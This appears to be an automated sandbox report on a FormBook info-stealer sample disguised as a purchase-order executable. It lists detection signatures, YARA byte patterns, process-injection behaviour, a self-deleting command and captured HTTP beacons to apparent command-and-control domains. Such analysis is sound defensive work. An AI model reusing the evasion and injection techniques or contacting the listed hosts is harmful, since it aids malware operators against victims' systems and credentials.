
Analysis Report PO98765.exe

Overview

General Information

Sample Name: PO98765.exe
Analysis ID: 323082
MD5: 137ec800f9c49390f2f225ab22774443
SHA1: 2f3f1a1615b625cb1daf8d1e4a3eba208a89e30d
SHA256: 60263179eccb843c5aa38040ebd2483b29a3923a94987f006561488e5d0f1d96
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO98765.exe (PID: 484 cmdline: 'C:\Users\user\Desktop\PO98765.exe' MD5: 137EC800F9C49390F2F225AB22774443)
    • PO98765.exe (PID: 2440 cmdline: C:\Users\user\Desktop\PO98765.exe MD5: 137EC800F9C49390F2F225AB22774443)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6024 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5068 cmdline: /c del 'C:\Users\user\Desktop\PO98765.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(18 further memory dump entries are not shown.)

Unpacked PEs

Source: 1.2.PO98765.exe.400000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.PO98765.exe.400000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 1.2.PO98765.exe.400000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.2.PO98765.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.PO98765.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(1 further unpacked PE entry is not shown.)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: PO98765.exe, Virustotal: Detection: 14%
Source: PO98765.exe, ReversingLabs: Detection: 10%

Yara detected FormBook
Source: Yara match, file source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file
Source: 1.2.PO98765.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PO98765.exe, code function: 4x nop then jmp 05BA779Ch
Source: C:\Users\user\Desktop\PO98765.exe, code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\PO98765.exe, code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49709
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.4:49712
Source: global traffic, HTTP traffic detected: GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1 Host: www.westhighlandwaytours.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1 Host: www.bloochy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
Source: Joe Sandbox View, ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic, HTTP traffic detected: GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1 Host: www.westhighlandwaytours.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1 Host: www.bloochy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown, DNS traffic detected: queries for: www.westhighlandwaytours.com

Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp, strings found in binary or memory:
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-user.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp, string found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000002.924230430.0000000002B50000.00000002.00000001.sdmp, string found in binary or memory: http://www.%s.comPA

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, file source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO98765.exe, code functions:
  • 1_2_0041A050 NtClose
  • 1_2_0041A100 NtAllocateVirtualMemory
  • 1_2_00419F20 NtCreateFile
  • 1_2_00419FD0 NtReadFile
  • 1_2_00419FCA NtReadFile
  • 1_2_01519910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 1_2_015199A0 NtCreateSection, LdrInitializeThunk
  • 1_2_01519840 NtDelayExecution, LdrInitializeThunk
  • 1_2_01519860 NtQuerySystemInformation, LdrInitializeThunk
  • 1_2_015198F0 NtReadVirtualMemory, LdrInitializeThunk
  • 1_2_01519A50 NtCreateFile, LdrInitializeThunk
  • 1_2_01519A00 NtProtectVirtualMemory, LdrInitializeThunk
  • 1_2_01519A20 NtResumeThread, LdrInitializeThunk
  • 1_2_01519540 NtReadFile, LdrInitializeThunk
  • 1_2_015195D0 NtClose, LdrInitializeThunk
  • 1_2_01519710 NtQueryInformationToken, LdrInitializeThunk
  • 1_2_01519780 NtMapViewOfSection, LdrInitializeThunk
  • 1_2_015197A0 NtUnmapViewOfSection, LdrInitializeThunk
  • 1_2_01519660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 1_2_015196E0 NtFreeVirtualMemory, LdrInitializeThunk
  • 1_2_01519950 NtQueueApcThread
  • 1_2_015199D0 NtCreateProcessEx
  • 1_2_0151B040 NtSuspendThread
  • 1_2_01519820 NtEnumerateKey
  • 1_2_015198A0 NtWriteVirtualMemory
  • 1_2_01519B00 NtSetValueKey
  • 1_2_0151A3B0 NtGetContextThread
  • 1_2_01519A10 NtQuerySection
  • 1_2_01519A80 NtOpenDirectoryObject
  • 1_2_01519560 NtWriteFile
  • 1_2_0151AD30 NtSetContextThread
  • 1_2_01519520 NtWaitForSingleObject
  • 1_2_015195F0 NtQueryInformationFile
  • 1_2_0151A770 NtOpenThread
  • 1_2_01519770 NtSetInformationFile
  • 1_2_01519760 NtOpenProcess
  • 1_2_0151A710 NtOpenProcessToken
  • 1_2_01519730 NtQueryVirtualMemory
  • 1_2_01519FE0 NtCreateMutant
  • 1_2_01519650 NtQueryValueKey
  • 1_2_01519670 NtQueryInformationProcess
  • 1_2_01519610 NtEnumerateValueKey
  • 1_2_015196D0 NtCreateKey
Source: C:\Windows\SysWOW64\mstsc.exe, code functions:
  • 3_2_05149540 NtReadFile, LdrInitializeThunk
  • 3_2_051495D0 NtClose, LdrInitializeThunk
  • 3_2_05149710 NtQueryInformationToken, LdrInitializeThunk
  • 3_2_05149780 NtMapViewOfSection, LdrInitializeThunk
  • 3_2_05149FE0 NtCreateMutant, LdrInitializeThunk
  • 3_2_05149650 NtQueryValueKey, LdrInitializeThunk
  • 3_2_05149660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 3_2_051496D0 NtCreateKey, LdrInitializeThunk
  • 3_2_051496E0 NtFreeVirtualMemory, LdrInitializeThunk
  • 3_2_05149910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 3_2_051499A0 NtCreateSection, LdrInitializeThunk
  • 3_2_05149840 NtDelayExecution, LdrInitializeThunk
  • 3_2_05149860 NtQuerySystemInformation, LdrInitializeThunk
  • 3_2_05149A50 NtCreateFile, LdrInitializeThunk
  • 3_2_0514AD30 NtSetContextThread
  • 3_2_05149520 NtWaitForSingleObject
  • 3_2_05149560 NtWriteFile
  • 3_2_051495F0 NtQueryInformationFile
  • 3_2_0514A710 NtOpenProcessToken
  • 3_2_05149730 NtQueryVirtualMemory
  • 3_2_0514A770 NtOpenThread
  • 3_2_05149770 NtSetInformationFile
  • 3_2_05149760 NtOpenProcess
  • 3_2_051497A0 NtUnmapViewOfSection
  • 3_2_05149610 NtEnumerateValueKey
  • 3_2_05149670 NtQueryInformationProcess
  • 3_2_05149950 NtQueueApcThread
  • 3_2_051499D0 NtCreateProcessEx
  • 3_2_05149820 NtEnumerateKey
  • 3_2_0514B040 NtSuspendThread
  • 3_2_051498A0 NtWriteVirtualMemory
  • 3_2_051498F0 NtReadVirtualMemory
  • 3_2_05149B00 NtSetValueKey
  • 3_2_0514A3B0 NtGetContextThread
  • 3_2_05149A10 NtQuerySection
  • 3_2_05149A00 NtProtectVirtualMemory
  • 3_2_05149A20 NtResumeThread
  • 3_2_05149A80 NtOpenDirectoryObject
  • 3_2_00C8A050 NtClose
  • 3_2_00C8A100 NtAllocateVirtualMemory
  • 3_2_00C89FD0 NtReadFile
  • 3_2_00C89F20 NtCreateFile
  • 3_2_00C89FCA NtReadFile
Source: C:\Users\user\Desktop\PO98765.exe, code functions: 0_2_0266B264, 0_2_0266C2B0, 0_2_02669998, 0_2_0266DF73, 0_2_05BA17B0, 0_2_05BA3798, 0_2_05BA8EF8, 0_2_05BA2080, 0_2_05BA1468, 0_2_05BBBF38, 0_2_05BBB530, 0_2_003567E9, 1_2_0041D853, 1_2_00401030, 1_2_0041D38E, 1_2_00402D88, 1_2_00402D90, 1_2_00409E30, 1_2_0041E73A, 1_2_00402FB0, 1_2_014DF900, 1_2_014F4120, 1_2_01591002, 1_2_015AE824, 1_2_015A28EC, 1_2_014EB090, 1_2_015020A0, 1_2_015A20A8, 1_2_015A2B28, 1_2_015903DA, 1_2_0159DBD2, 1_2_0150EBB0, 1_2_015A22AE, 1_2_015A1D55, 1_2_015A2D07, 1_2_014D0D20, 1_2_015A25DD, 1_2_014ED5E0, 1_2_01502581, 1_2_0159D466, 1_2_014E841F, 1_2_015ADFCE, 1_2_015A1FF1, 1_2_0159D616, 1_2_014F6E30, 1_2_015A2EF7, 1_2_00AB67E9
Source: C:\Windows\SysWOW64\mstsc.exe, code functions: 3_2_051D2D07, 3_2_05100D20, 3_2_051D1D55, 3_2_05132581, 3_2_051D25DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CD466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CD616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05126E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D28EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CDBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D853
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D816
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D38E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72D88
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C79E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8E73A
          Source: C:\Users\user\Desktop\PO98765.exeCode function: String function: 014DB150 appears 45 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0510B150 appears 35 times
          Source: PO98765.exeBinary or memory string: OriginalFilename vs PO98765.exe
          Source: PO98765.exe, 00000000.00000002.677683735.0000000000352000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: PO98765.exe, 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs PO98765.exe
          Source: PO98765.exeBinary or memory string: OriginalFilename vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.715044726.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.717371551.0000000003263000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.716576209.00000000015CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO98765.exe
          Source: PO98765.exeBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
